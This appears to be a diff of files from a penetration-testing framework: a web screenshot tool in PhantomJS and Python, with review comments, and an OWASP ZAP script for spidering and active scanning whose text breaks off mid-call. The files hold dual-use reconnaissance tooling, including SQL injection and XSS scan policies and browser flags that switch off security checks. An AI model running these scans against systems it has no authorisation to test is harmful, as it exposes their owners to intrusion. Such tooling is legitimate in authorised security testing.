if (p_http_username.test(system.args[i]) === true)
{
http_username = p_http_username.exec(system.args[i])[1];
}
if (p_http_password.test(system.args[i]) === true)
{
http_password = p_http_password.exec(system.args[i])[1];
}
if (p_header.test(system.args[i]) === true)
{
var header = p_header.exec(system.args[i]);
var p_header_split = header[1].split(': ', 2);
var header_name = p_header_split[0];
var header_value = p_header_split[1];
temp_custom_headers[header_name] = header_value;
}
}
if (typeof(URL) === 'undefined' || URL.length == 0 || typeof(output_file) === 'undefined' || output_file.length == 0) {
console.log("Usage: phantomjs [options] webscreenshot.js url_capture=<URL> output_file=<output_file.png> [header=<custom header> http_username=<HTTP basic auth username> http_password=<HTTP basic auth password>]");
console.log('Please specify an URL to capture and an output png filename !');
phantom.exit(1);
}
else {
var page = Page(temp_custom_headers, http_username, http_password);
page.render(URL, output_file);
}
}
main();
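Review bot: The HTTP Basic credentials are read from the command line (`http_username=...`, `http_password=...` in `system.args`), which forces the Python driver to put the password into the process arguments where any local user can read it with `ps`; PhantomJS exposes `require('system').env`, so the driver could hand them over through environment variables instead. The custom header parser `header[1].split(': ', 2)` leaves `header_value` undefined when the argument contains no `': '` separator, and because the limit of 2 drops everything after the second separator a value that itself contains `': '` is truncated; split on the first `':'` and trim both parts. Also note `page.onError = noop` silences every script error along with the confirm and prompt dialogs, so a page that fails to render gives no diagnostic; log the error message at debug level instead.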

432
bin/webscreenshot.py Normal file

@@ -0,0 +1,432 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of webscreenshot.
#
# Copyright (C) 2018, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# webscreenshot is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# webscreenshot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with webscreenshot. If not, see <http://www.gnu.org/licenses/>.
import re
import os
import sys
import subprocess
import datetime
import time
import signal
import multiprocessing
import itertools
import shlex
import logging
import errno
# Script version
VERSION = '2.2.1'
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="usage: %prog [options] URL")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help = '<INPUT_FILE>: text file containing the target list. Ex: list.txt', nargs = 1)
main_grp.add_option('-o', '--output-directory', help = '<OUTPUT_DIRECTORY> (optional): screenshots output directory (default \'./screenshots/\')', nargs = 1)
main_grp.add_option('-r', '--renderer', help = '<RENDERER> (optional): renderer to use among \'phantomjs\' (legacy but best results), \'chrome\', \'chromium\' (version > 57) (default \'phantomjs\')', choices = ['phantomjs', 'chrome', 'chromium'], default = 'phantomjs', nargs = 1)
main_grp.add_option('-w', '--workers', help = '<WORKERS> (optional): number of parallel execution workers (default 2)', default = 2, nargs = 1)
main_grp.add_option('-v', '--verbosity', help = '<VERBOSITY> (optional): verbosity level, repeat it to increase the level { -v INFO, -vv DEBUG } (default verbosity ERROR)', action = 'count', default = 0)
proc_grp = OptionGroup(parser, 'Input processing parameters')
proc_grp.add_option('-p', '--port', help = '<PORT> (optional): use the specified port for each target in the input list. Ex: -p 80', nargs = 1)
proc_grp.add_option('-s', '--ssl', help = '<SSL> (optional): enforce ssl for every connection', action = 'store_true', default = False)
proc_grp.add_option('-m', '--multiprotocol', help = '<MULTIPROTOCOL> (optional): perform screenshots over HTTP and HTTPS for each target', action = 'store_true', default = False)
http_grp = OptionGroup(parser, 'HTTP parameters')
http_grp.add_option('-c', '--cookie', help = '<COOKIE_STRING> (optional): cookie string to add. Ex: -c "JSESSIONID=1234; YOLO=SWAG"', nargs = 1)
http_grp.add_option('-a', '--header', help = '<HEADER> (optional): custom or additional header. Repeat this option for every header. Ex: -a "Host: localhost" -a "Foo: bar"', action = 'append')
http_grp.add_option('-u', '--http-username', help = '<HTTP_USERNAME> (optional): specify a username for HTTP Basic Authentication.')
http_grp.add_option('-b', '--http-password', help = '<HTTP_PASSWORD> (optional): specify a password for HTTP Basic Authentication.')
conn_grp = OptionGroup(parser, 'Connection parameters')
conn_grp.add_option('-P', '--proxy', help = '<PROXY> (optional): specify a proxy. Ex: -P http://proxy.company.com:8080')
conn_grp.add_option('-A', '--proxy-auth', help = '<PROXY_AUTH> (optional): provides authentication information for the proxy. Ex: -A user:password')
conn_grp.add_option('-T', '--proxy-type', help = '<PROXY_TYPE> (optional): specifies the proxy type, "http" (default), "none" (disable completely), or "socks5". Ex: -T socks')
conn_grp.add_option('-t', '--timeout', help = '<TIMEOUT> (optional): renderer execution timeout in seconds (default 30 sec)', default = 30, nargs = 1)
parser.option_groups.extend([main_grp, proc_grp, http_grp, conn_grp])
# renderer binaries, hoping to find it in a $PATH directory
## Be free to change them to your own full-path location
PHANTOMJS_BIN = 'phantomjs'
CHROME_BIN = 'google-chrome'
CHROMIUM_BIN = 'chromium'
WEBSCREENSHOT_JS = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), './webscreenshot.js'))
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), './screenshots/'))
# Logger definition
LOGLEVELS = {0 : 'ERROR', 1 : 'INFO', 2 : 'DEBUG'}
logger_output = logging.StreamHandler(sys.stdout)
logger_output.setFormatter(logging.Formatter('[%(levelname)s][%(name)s] %(message)s'))
logger_gen = logging.getLogger("General")
logger_gen.addHandler(logger_output)
# Macros
SHELL_EXECUTION_OK = 0
SHELL_EXECUTION_ERROR = -1
PHANTOMJS_HTTP_AUTH_ERROR_CODE = 2
# Handful patterns
p_ipv4_elementary = '(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})'
p_domain = '[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,6}'
p_port = '\d{0,5}'
p_resource = '(?:/(?P<res>.*))?'
full_uri_domain = re.compile('^(?P<protocol>http(?:|s))://(?P<host>%s|%s)(?::(?P<port>%s))?%s$' % (p_domain, p_ipv4_elementary, p_port, p_resource))
fqdn_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s$' % (p_domain, p_port, p_resource))
fqdn_only = re.compile('^(?P<host>%s)%s$' % (p_domain, p_resource))
ipv4_and_port = re.compile('^(?P<host>%s):(?P<port>%s)%s' % (p_ipv4_elementary, p_port, p_resource))
ipv4_only = re.compile('^(?P<host>%s)%s$' % (p_ipv4_elementary, p_resource))
entry_from_csv = re.compile('^(?P<host>%s|%s)\s+(?P<port>\d+)$' % (p_domain, p_ipv4_elementary))
# Handful functions
def init_worker():
"""
Tell the workers to ignore a global SIGINT interruption
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def kill_em_all(signal, frame):
"""
Terminate all processes while capturing a SIGINT from the user
"""
logger_gen.info('CTRL-C received, exiting')
sys.exit(0)
def shell_exec(url, command, options):
"""
Execute a shell command following a timeout
Taken from http://howto.pui.ch/post/37471155682/set-timeout-for-a-shell-command-in-python
"""
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
logger_url = logging.getLogger("%s" % url)
logger_url.setLevel(options.log_level)
timeout = int(options.timeout)
start = datetime.datetime.now()
try :
p = subprocess.Popen(shlex.split(command), shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# binaries timeout
while p.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
logger_url.debug("Shell command PID %s reached the timeout, killing it now" % p.pid)
logger_url.error("Screenshot somehow failed\n")
if sys.platform == 'win32':
p.send_signal(signal.SIGTERM)
else:
p.send_signal(signal.SIGKILL)
return SHELL_EXECUTION_ERROR
retval = p.poll()
if retval != SHELL_EXECUTION_OK:
if retval == PHANTOMJS_HTTP_AUTH_ERROR_CODE:
# HTTP Authentication request
logger_url.error("HTTP Authentication requested, try to pass credentials with -u and -b options")
else:
# Phantomjs general error
logger_url.error("Shell command PID %s returned an abnormal error code: '%s'" % (p.pid,retval))
logger_url.error("Screenshot somehow failed\n")
return SHELL_EXECUTION_ERROR
else:
# Phantomjs ok
logger_url.debug("Shell command PID %s ended normally" % p.pid)
logger_url.info("Screenshot OK\n")
return SHELL_EXECUTION_OK
except Exception as e:
if e.errno and e.errno == errno.ENOENT :
logger_url.error('renderer binary could not have been found in your current PATH environment variable, exiting')
else:
logger_gen.error('Unknown error: %s, exiting' % e )
return SHELL_EXECUTION_ERROR
def filter_bad_filename_chars(filename):
#print (filename)
"""
Filter bad chars for any filename
"""
# Before, just avoid triple underscore escape for the classic '://' pattern
filename = filename.replace('http://', '')
filename = filename.replace('https://', '')
#print (filename)
return re.sub('[^\w\-_\. ]', '-port', filename)
#print (filename)
def extract_all_matched_named_groups(regex, match):
"""
Return a set of all extractable matched parameters.
>>> full_uri_domain.groupindex
{'domain': 1, 'port': 3}
>>>full_uri_domain.match('http://8.8.8.8:80').group('domain')
'8.8.8.8'
>>>extract_all_matched_named_groups() => {'domain': '8.8.8.8', 'port': '80'}
"""
result = {}
for name, id in regex.groupindex.items():
matched_value = match.group(name)
if matched_value != None: result[name] = matched_value
return result
def entry_format_validator(line):
"""
Validate the current line against several regexes and return matched parameters (ip, domain, port etc.)
"""
tab = { 'full_uri_domain' : full_uri_domain,
'fqdn_only' : fqdn_only,
'fqdn_and_port' : fqdn_and_port,
'ipv4_and_port' : ipv4_and_port,
'ipv4_only' : ipv4_only,
'entry_from_csv' : entry_from_csv
}
for name, regex in tab.items():
validator = regex.match(line)
if validator:
return extract_all_matched_named_groups(regex, validator)
def parse_targets(options, arguments):
"""
Parse list and convert each target to valid URI with port(protocol://foobar:port)
"""
target_list = []
if options.input_file != None:
with open(options.input_file,'rb') as fd_input:
try:
lines = [l.decode('utf-8').lstrip().rstrip().strip() for l in fd_input.readlines()]
except UnicodeDecodeError as e:
logger_gen.error('Your input file is not UTF-8 encoded, please encode it before using this script')
sys.exit(0)
else:
lines = arguments
for index, line in enumerate(lines, start=1):
matches = entry_format_validator(line)
# pass if line can be recognized as a correct input, or if no 'host' group could be found with all the regexes
if matches == None or not('host' in matches.keys()):
logger_gen.warn("Line %s '%s' could not have been recognized as a correct input" % (index, line))
pass
else:
host = matches['host']
# Protocol is 'http' by default, unless ssl is forced
if options.ssl == True:
protocol = 'https'
elif 'protocol' in matches.keys():
protocol = str(matches['protocol'])
else:
protocol = 'http'
# Port is ('80' for http) or ('443' for https) by default, unless a specific port is supplied
if options.port != None:
port = options.port
elif 'port' in matches.keys():
port = int(matches['port'])
# if port is 443, assume protocol is https if is not specified
protocol = 'https' if port == 443 else protocol
else:
port = 443 if protocol == 'https' else 80
# No resource URI by default
if 'res' in matches.keys():
res = str(matches['res'])
else:
res = None
# perform screenshots over HTTP and HTTPS for each target
if options.multiprotocol:
final_uri_http_port = int(matches['port']) if 'port' in matches.keys() else 80
final_uri_http = '%s://%s:%s' % ('http', host, final_uri_http_port)
target_list.append(final_uri_http)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_http))
final_uri_https_port = int(matches['port']) if 'port' in matches.keys() else 443
final_uri_https = '%s://%s:%s' % ('https', host, final_uri_https_port)
target_list.append(final_uri_https)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri_https))
else:
final_uri = '%s://%s:%s' % (protocol, host, port)
final_uri = final_uri + '/%s' % res if res != None else final_uri
target_list.append(final_uri)
logger_gen.info("'%s' has been formatted as '%s' with supplied overriding options" % (line, final_uri))
return target_list
def craft_cmd(url_and_options):
"""
Craft the correct command with url and options
"""
global logger_output, PHANTOMJS_BIN, WEBSCREENSHOT_JS, SCREENSHOTS_DIRECTORY, SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
url, options = url_and_options
logger_url = logging.getLogger("%s" % url)
logger_url.addHandler(logger_output)
logger_url.setLevel(options.log_level)
#output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.png' % filter_bad_filename_chars(url)))
output_filename = os.path.join(SCREENSHOTS_DIRECTORY, ('%s.jpg' % filter_bad_filename_chars(url)))
# PhantomJS renderer
if options.renderer == 'phantomjs':
# If you ever want to add some voodoo options to the phantomjs command to be executed, that's here right below
cmd_parameters = [ PHANTOMJS_BIN,
'--ignore-ssl-errors true',
'--ssl-protocol any',
'--ssl-ciphers ALL'
]
cmd_parameters.append("--proxy %s" % options.proxy) if options.proxy != None else None
cmd_parameters.append("--proxy-auth %s" % options.proxy_auth) if options.proxy_auth != None else None
cmd_parameters.append("--proxy-type %s" % options.proxy_type) if options.proxy_type != None else None
cmd_parameters.append('"%s" url_capture="%s" output_file="%s"' % (WEBSCREENSHOT_JS, url, output_filename))
cmd_parameters.append('header="Cookie: %s"' % options.cookie.rstrip(';')) if options.cookie != None else None
cmd_parameters.append('http_username="%s"' % options.http_username) if options.http_username != None else None
cmd_parameters.append('http_password="%s"' % options.http_password) if options.http_password != None else None
if options.header:
for header in options.header:
cmd_parameters.append('header="%s"' % header.rstrip(';'))
# Chrome and chromium renderers
else:
cmd_parameters = [ CHROME_BIN ] if options.renderer == 'chrome' else [ CHROMIUM_BIN ]
cmd_parameters += [ '--allow-running-insecure-content',
'--ignore-certificate-errors',
'--ignore-urlfetcher-cert-requests',
'--reduce-security-for-testing',
'--no-sandbox',
'--headless',
'--disable-gpu',
'--hide-scrollbars',
'--incognito',
'-screenshot="%s"' % output_filename,
'--window-size=1200,800',
'"%s"' % url
]
cmd_parameters.append('--proxy-server="%s"' % options.proxy) if options.proxy != None else None
cmd = " ".join(cmd_parameters)
logger_url.debug("Shell command to be executed\n'%s'\n" % cmd)
execution_retval = shell_exec(url, cmd, options)
return execution_retval, url
def take_screenshot(url_list, options):
"""
Launch the screenshot workers
Thanks http://noswap.com/blog/python-multiprocessing-keyboardinterrupt
"""
global SHELL_EXECUTION_OK, SHELL_EXECUTION_ERROR
screenshot_number = len(url_list)
print "[+] %s URLs to be screenshot" % screenshot_number
pool = multiprocessing.Pool(processes=int(options.workers), initializer=init_worker)
taken_screenshots = [r for r in pool.imap(func=craft_cmd, iterable=itertools.izip(url_list, itertools.repeat(options)))]
screenshots_error_url = [url for retval, url in taken_screenshots if retval == SHELL_EXECUTION_ERROR]
screenshots_error = sum(retval == SHELL_EXECUTION_ERROR for retval, url in taken_screenshots)
screenshots_ok = int(screenshot_number - screenshots_error)
print "[+] %s actual URLs screenshot" % screenshots_ok
print "[+] %s error(s)" % screenshots_error
if screenshots_error != 0:
for url in screenshots_error_url:
print " %s" % url
return None
def main():
"""
Dat main
"""
global VERSION, SCREENSHOTS_DIRECTORY, LOGLEVELS
signal.signal(signal.SIGINT, kill_em_all)
print 'webscreenshot.py version %s\n' % VERSION
options, arguments = parser.parse_args()
try :
options.log_level = LOGLEVELS[options.verbosity]
logger_gen.setLevel(options.log_level)
except :
parser.error("Please specify a valid log level")
if (options.input_file == None and (len(arguments) > 1 or len(arguments) == 0)):
parser.error('Please specify a valid input file or a valid URL')
if (options.input_file != None and len(arguments) == 1):
parser.error('Please specify either an input file or an URL')
if (options.output_directory != None):
SCREENSHOTS_DIRECTORY = os.path.abspath(os.path.join(os.getcwdu(), options.output_directory))
logger_gen.debug("Options: %s\n" % options)
if not os.path.exists(SCREENSHOTS_DIRECTORY):
logger_gen.info("'%s' does not exist, will then be created" % SCREENSHOTS_DIRECTORY)
os.makedirs(SCREENSHOTS_DIRECTORY)
url_list = parse_targets(options, arguments)
take_screenshot(url_list, options)
return None
if __name__ == "__main__" :
main()
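Review bot: this file is still Python 2 source and will not compile under a Python 3 interpreter: `print "[+] %s URLs to be screenshot" % screenshot_number`, the other `print` statements in take_screenshot() and main(), `itertools.izip(...)` in take_screenshot() and `os.getcwdu()` in main() all need their Python 3 forms (`print(...)`, `zip(...)`, `os.getcwd()`). In shell_exec() the `except Exception as e:` handler reads `e.errno` for every exception type, so an exception without that attribute (a ValueError from `shlex.split` on an unbalanced quote, for instance) raises AttributeError inside the handler instead of reaching the 'Unknown error' branch; test with `getattr(e, 'errno', None) == errno.ENOENT` or catch OSError separately. The timeout branch sends the kill signal and returns without `p.wait()`, so the killed renderer stays a zombie for the life of the worker. Also note that `http_password="%s"` and `--proxy-auth %s` in craft_cmd() place credentials on the renderer's command line, where any local user can read them from the process list, and the "Shell command to be executed" debug line writes them to the log as well; passing them via a file or environment variable would avoid both exposures.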

510
bin/zap-scan.py Normal file

@@ -0,0 +1,510 @@
#!/usr/bin/env python3
'''
This script aims to be the most generic and the most explicit possible.
It works with OWASP ZAP API Python client.
To use it, you have to load the Python API client module and start ZAP
Before starting this script for the first time: Open ZAP, go to
Tools -> Options -> API -> Generate random Key, copy and paste the key in the
variable "apiKey" of the configuration area
This script is divided into two parts : a configuration area, where you have to
change variables according to your needs, and the part with API calls.
Author : aine-rb on Github, from Sopra Steria - modified for Sn1per by @xer0dayz
'''
import time
from pprint import pprint
from zapv2 import ZAPv2
import sys, getopt
targetURL = str(sys.argv[1])
#######################################
### BEGINNING OF CONFIGURATION AREA ###
#######################################
## The user only needs to change variable values bellow to make the script
## work according to his/her needs. MANDATORY parameters must not be empty
# MANDATORY. Define the API key generated by ZAP and used to verify actions.
apiKey=''
# MANDATORY. Define the listening address of ZAP instance
localProxy = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"}
# MANDATORY. True to create another ZAP session (overwrite the former if the
# same name already exists), False to use an existing one
isNewSession = True
# MANDATORY. ZAP Session name
sessionName = 'WebgoatSession'
# Define the list of global exclude URL regular expressions. List can be empty.
# The expressions must follow the java.util.regex.Pattern class syntax
# The following example excludes every single URL except http://localhost:8081
globalExcludeUrl = ['^(?:(?!http:\/\/localhost:8081).*).$']
# MANDATORY. Define if an outgoing proxy server is used
useProxyChain = False
# MANDATORY only if useProxyChain is True, ignored otherwise.
# Outgoing proxy address and port
proxyAddress = 'my.corp.proxy'
proxyPort = '8080'
# Define the addresses to skip in case useProxyChain is True. Ignored
# otherwise. List can be empty.
skipProxyAddresses = ('127.0.0.1;'
'localhost')
# MANDATORY only if useProxyChain is True. Ignored otherwise.
# Define if proxy server needs authentication
useProxyChainAuth = False
# MANDATORY only if useProxyChainAuth is True. Ignored otherwise
proxyUsername = ''
proxyPassword = ''
proxyRealm = ''
# MANDATORY. Determine if a proxy script must be loaded. Proxy scripts are
# executed for every request traversing ZAP
useProxyScript = False
# MANDATORY only if useProxyScript is True. Ignored otherwise
proxyScriptName = 'proxyScript.js'
# Script engine values: "Oracle Nashorn" for Javascript,
# "jython" for python, "JSR 223 JRuby Engine" for ruby
proxyScriptEngine = 'Oracle Nashorn'
# Asolute local path
proxyScriptFileName = '/zap/scripts/proxy/proxyScript.js'
proxyScriptDescription = 'This is a description'
# MANDATORY. Determine if context must be configured then used during scans.
# You have to set this parameter to True if you want that ZAP performs scans
# from the point of view of a specific user
useContextForScan = False
# MANDATORY only if useContextForScan is True. Ignored otherwise. Set value to
# True to define a new context. Set value to False to use an existing one.
defineNewContext = False
# MANDATORY only if defineNewContext is True. Ignored otherwise
contextName = 'WebGoat_script-based'
# MANDATORY only if defineNewContext is False. Disregarded otherwise.
# Corresponds to the ID of the context to use
contextId = 0
# Define Context Include URL regular expressions. Ignored if useContextForScan
# is False. You have to put the URL you want to test in this list.
contextIncludeURL = [targetURL + '.*']
# Define Context Exclude URL regular expressions. Ignored if useContextForScan
# is False. List can be empty.
contextExcludeURL = ['http://localhost:8081/WebGoat/j_spring_security_logout',
'http://localhost:8081/WebGoat/logout.mvc']
# MANDATORY only if useContextForScan is True. Ignored otherwise. Define the
# session management method for the context. Possible values are:
# "cookieBasedSessionManagement"; "httpAuthSessionManagement"
sessionManagement = 'cookieBasedSessionManagement'
# MANDATORY only if useContextForScan is True. Ignored otherwise. Define
# authentication method for the context. Possible values are:
# "manualAuthentication"; "scriptBasedAuthentication"; "httpAuthentication";
# "formBasedAuthentication"
authMethod = 'scriptBasedAuthentication'
# MANDATORY only if authMethod is set to scriptBasedAuthentication.
# Ignored otherwise
authScriptName = 'TwoStepAuthentication.js'
# Script engine values: Oracle Nashorn for Javascript
# jython for python, JSR 223 JRuby Engine for ruby
authScriptEngine = 'Oracle Nashorn'
# Absolute local path
authScriptFileName = '/zap/scripts/authentication/TwoStepAuthentication.js'
authScriptDescription = 'This is a description'
# MANDATORY only if useContextForScan is True. Ignored otherwise. Each
# name/value pair of authParams are expected to be "x-www-form-urlencoded"
# Here is an example for scriptBasedAuthentication method:
authParams = ('scriptName=' + authScriptName + '&'
'Submission Form URL=http://localhost:8081/WebGoat/j_spring_security_check&'
'Username field=username&'
'Password field=password&'
'Target URL=http://localhost:8081/WebGoat/welcome.mvc')
## Here is an example for formBasedAuthentication method:
#authParams = ('loginUrl=http://localhost:8081/WebGoat/j_spring_security_check&'
# 'loginRequestData=username%3D%7B%25username%25%7D%26'
# 'password%3D%7B%25password%25%7D')
##Here is an example for httpAuthentication method:
#authParams = ('hostname=http://www.example.com&'
# 'realm=CORP\\administrator&'
# 'port=80')
# MANDATORY only if useContextForScan is True. Ignored otherwise.
# Set the value to True if a loggedin indicator must be used. False if it's a
# logged out indicator that must be used
isLoggedInIndicator = False
# MANDATORY only if useContextForScan is True. Ignored otherwise.
# Define either a loggedin or a loggedout indicator regular expression.
# It allows ZAP to see if the user is always authenticated during scans.
indicatorRegex = '\QLocation: http://localhost:8081/WebGoat/login.mvc\E'
# MANDATORY only if useContextForScan is True. Ignored otherwise.
# Set value to True to create new users, False otherwise
createUser = False
# MANDATORY only if createUser is True. Ignored otherwise. Define the list of
# users, with name and credentials (in x-www-form-urlencoded format)
## Here is an example with the script NashornTwoStepAuthentication.js:
userList = [
{'name': 'guest', 'credentials': 'Username=guest&Password=guest'},
{'name': 'webgoat', 'credentials': 'Username=webgoat&Password=webgoat'}
]
## Here is an example with formBasedAuthentication:
#userList = [
# {'name': 'guest', 'credentials': 'username=guest&password=guest'},
# {'name': 'webgoat', 'credentials': 'username=webgoat&password=webgoat'}
#]
# MANDATORY only if useContextForScan is True. Ignored otherwise. List can be
# empty. Define the userid list. Created users will be added to this list later
userIdList = []
# MANDATORY. Define the target site to test
#target = 'http://10.0.0.19/'
target = targetURL
# You can specify other URL in order to help ZAP discover more site locations
# List can be empty
applicationURL = ['']
# MANDATORY. Set value to True if you want to customize and use a scan policy
useScanPolicy = False
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set a policy name
scanPolicyName = 'SQL Injection and XSS'
# MANDATORY only if useScanPolicy is True. Ignored otherwise.
# Set value to True to disable all scan types except the ones set in ascanIds,
# False to enable all scan types except the ones set in ascanIds..
isWhiteListPolicy = False
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set the scan IDs
# to use with the policy. Other scan types will be disabled if
# isWhiteListPolicy is True, enabled if isWhiteListPolicy is False.
# Use zap.ascan.scanners() to list all ascan IDs.
## In the example bellow, the first line corresponds to SQL Injection scan IDs,
## the second line corresponds to some XSS scan IDs
ascanIds = [40018, 40019, 40020, 40021, 40022, 40024, 90018,
40012, 40014, 40016, 40017]
# MANDATORY only if useScanPolicy is True. Ignored otherwise. Set the alert
# Threshold and the attack strength of enabled active scans.
# Currently, possible values are:
# Low, Medium and High for alert Threshold
# Low, Medium, High and Insane for attack strength
alertThreshold = 'Medium'
attackStrength = 'Low'
# MANDATORY. Set True to use Ajax Spider, False otherwise.
useAjaxSpider = True
# MANDATORY. Set True to shutdown ZAP once finished, False otherwise
shutdownOnceFinished = False
#################################
### END OF CONFIGURATION AREA ###
#################################
sys.stdout = open("/usr/share/sniper/bin/zap-report.txt", "w")
# Connect ZAP API client to the listening address of ZAP instance
zap = ZAPv2(proxies=localProxy, apikey=apiKey)
# Start the ZAP session
core = zap.core
if isNewSession:
pprint('Create ZAP session: ' + sessionName + ' -> ' +
core.new_session(name=sessionName, overwrite=True))
else:
pprint('Load ZAP session: ' + sessionName + ' -> ' +
core.load_session(name=sessionName))
# Configure ZAP global Exclude URL option
print('Add Global Exclude URL regular expressions:')
for regex in globalExcludeUrl:
pprint(regex + ' ->' + core.exclude_from_proxy(regex=regex))
# Configure ZAP outgoing proxy server connection option
pprint('Enable outgoing proxy chain: ' + str(useProxyChain) + ' -> ' +
core.set_option_use_proxy_chain(boolean=useProxyChain))
if useProxyChain:
pprint('Set outgoing proxy name: ' + proxyAddress + ' -> ' +
core.set_option_proxy_chain_name(string=proxyAddress))
pprint('Set outgoing proxy port: ' + proxyPort + ' -> ' +
core.set_option_proxy_chain_port(integer=proxyPort))
pprint('Skip names for outgoing proxy: ' + skipProxyAddresses + ' -> ' +
core.set_option_proxy_chain_skip_name(string=skipProxyAddresses))
# Configure ZAP outgoing proxy server authentication
pprint('Set outgoing proxy chain authentication: ' +
str(useProxyChainAuth) + ' -> ' +
core.set_option_use_proxy_chain_auth(boolean=useProxyChainAuth))
if useProxyChainAuth:
pprint('Set outgoing proxy username -> ' +
core.set_option_proxy_chain_user_name(string=proxyUsername))
pprint('Set outgoing proxy password -> ' +
core.set_option_proxy_chain_password(string=proxyPassword))
pprint('Set outgoing proxy realm: ' + proxyRealm + ' -> ' +
core.set_option_proxy_chain_realm(string=proxyRealm))
if useProxyScript:
script = zap.script
script.remove(scriptname=proxyScriptName)
pprint('Load proxy script: ' + proxyScriptName + ' -> ' +
script.load(scriptname=proxyScriptName, scripttype='proxy',
scriptengine=proxyScriptEngine,
filename=proxyScriptFileName,
scriptdescription=proxyScriptDescription))
pprint('Enable proxy script: ' + proxyScriptName + ' -> ' +
script.enable(scriptname=proxyScriptName))
if useContextForScan:
# Define the ZAP context
context = zap.context
if defineNewContext:
contextId = context.new_context(contextname=contextName)
pprint('Use context ID: ' + contextId)
# Include URL in the context
print('Include URL in context:')
for url in contextIncludeURL:
pprint(url + ' -> ' +
context.include_in_context(contextname=contextName,
regex=url))
# Exclude URL in the context
print('Exclude URL from context:')
for url in contextExcludeURL:
pprint(url + ' -> ' +
context.exclude_from_context(contextname=contextName,
regex=url))
# Setup session management for the context.
# There is no methodconfigparams to provide for both current methods
pprint('Set session management method: ' + sessionManagement + ' -> ' +
zap.sessionManagement.set_session_management_method(
contextid=contextId, methodname=sessionManagement,
methodconfigparams=None))
## In case we use the scriptBasedAuthentication method, load the script
if authMethod == 'scriptBasedAuthentication':
script = zap.script
script.remove(scriptname=authScriptName)
pprint('Load script: ' + authScriptName + ' -> ' +
script.load(scriptname=authScriptName,
scripttype='authentication',
scriptengine=authScriptEngine,
filename=authScriptFileName,
scriptdescription=authScriptDescription))
# Define an authentication method with parameters for the context
auth = zap.authentication
pprint('Set authentication method: ' + authMethod + ' -> ' +
auth.set_authentication_method(contextid=contextId,
authmethodname=authMethod,
authmethodconfigparams=authParams))
# Define either a loggedin indicator or a loggedout indicator regexp
# It allows ZAP to see if the user is always authenticated during scans
if isLoggedInIndicator:
pprint('Define Loggedin indicator: ' + indicatorRegex + ' -> ' +
auth.set_logged_in_indicator(contextid=contextId,
loggedinindicatorregex=indicatorRegex))
else:
pprint('Define Loggedout indicator: ' + indicatorRegex + ' -> ' +
auth.set_logged_out_indicator(contextid=contextId,
loggedoutindicatorregex=indicatorRegex))
# Define the users
users = zap.users
if createUser:
for user in userList:
userName = user.get('name')
print('Create user ' + userName + ':')
userId = users.new_user(contextid=contextId, name=userName)
userIdList.append(userId)
pprint('User ID: ' + userId + '; username -> ' +
users.set_user_name(contextid=contextId, userid=userId,
name=userName) +
'; credentials -> ' +
users.set_authentication_credentials(contextid=contextId,
userid=userId,
authcredentialsconfigparams=user.get('credentials')) +
'; enabled -> ' +
users.set_user_enabled(contextid=contextId, userid=userId,
enabled=True))
# Enable all passive scanners (it's possible to do a more specific policy by
# setting needed scan ID: Use zap.pscan.scanners() to list all passive scanner
# IDs, then use zap.scan.enable_scanners(ids) to enable what you want
pprint('Enable all passive scanners -> ' +
zap.pscan.enable_all_scanners())
ascan = zap.ascan
# Define if a new scan policy is used
if useScanPolicy:
ascan.remove_scan_policy(scanpolicyname=scanPolicyName)
pprint('Add scan policy ' + scanPolicyName + ' -> ' +
ascan.add_scan_policy(scanpolicyname=scanPolicyName))
for policyId in range(0, 5):
# Set alert Threshold for all scans
ascan.set_policy_alert_threshold(id=policyId,
alertthreshold=alertThreshold,
scanpolicyname=scanPolicyName)
# Set attack strength for all scans
ascan.set_policy_attack_strength(id=policyId,
attackstrength=attackStrength,
scanpolicyname=scanPolicyName)
if isWhiteListPolicy:
# Disable all active scanners in order to enable only what you need
pprint('Disable all scanners -> ' +
ascan.disable_all_scanners(scanpolicyname=scanPolicyName))
# Enable some active scanners
pprint('Enable given scan IDs -> ' +
ascan.enable_scanners(ids=ascanIds,
scanpolicyname=scanPolicyName))
else:
# Enable all active scanners
pprint('Enable all scanners -> ' +
ascan.enable_all_scanners(scanpolicyname=scanPolicyName))
# Disable some active scanners
pprint('Disable given scan IDs -> ' +
ascan.disable_scanners(ids=ascanIds,
scanpolicyname=scanPolicyName))
else:
print('No custom policy used for scan')
scanPolicyName = None
# Open URL inside ZAP
pprint('Access target URL ' + target)
core.access_url(url=target, followredirects=True)
for url in applicationURL:
pprint('Access URL ' + url)
core.access_url(url=url, followredirects=True)
# Give the sites tree a chance to get updated
time.sleep(2)
# Launch Spider, Ajax Spider (if useAjaxSpider is set to true) and
# Active scans, with a context and users or not
forcedUser = zap.forcedUser
spider = zap.spider
ajax = zap.ajaxSpider
scanId = 0
print('Starting Scans on target: ' + target)
if useContextForScan:
for userId in userIdList:
print('Starting scans with User ID: ' + userId)
# Spider the target and recursively scan every site node found
scanId = spider.scan_as_user(contextid=contextId, userid=userId,
